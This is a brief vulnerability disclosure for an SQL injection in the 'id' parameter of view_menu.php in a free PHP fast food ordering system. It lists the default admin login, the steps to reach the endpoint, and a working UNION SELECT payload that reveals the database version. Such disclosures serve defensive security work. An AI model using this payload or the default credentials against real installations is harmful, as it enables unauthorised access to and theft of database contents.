# SQL Injection Vulnerability in /ffos/admin/menus/view_menu.php Vendors Link: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ffos.zip Vulnerability File: `/ffos/admin/menus/view_menu.php` Vulnerability location: `/ffos/admin/menus/view_menu.php?id=<id>` ## PoC 1. Log in to the application using the admin credentials: - Username: admin - Password: admin123 2. Navigate to the menu list page at: - URL: http://localhost/ffos/admin/?page=menus 3. From the menu list, select the "Action" dropdown and click "View" to access the vulnerable endpoint (/ffos/admin/menus/view_menu.php). 4. http://localhost/ffos/admin/menus/view_menu.php?id=1  Modify the URL or input field with the following payload: [+] Payload: `http://localhost/ffos/admin/menus/view_menu.php?id=xxx'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat("result:+",version())--+-` The response will display the database version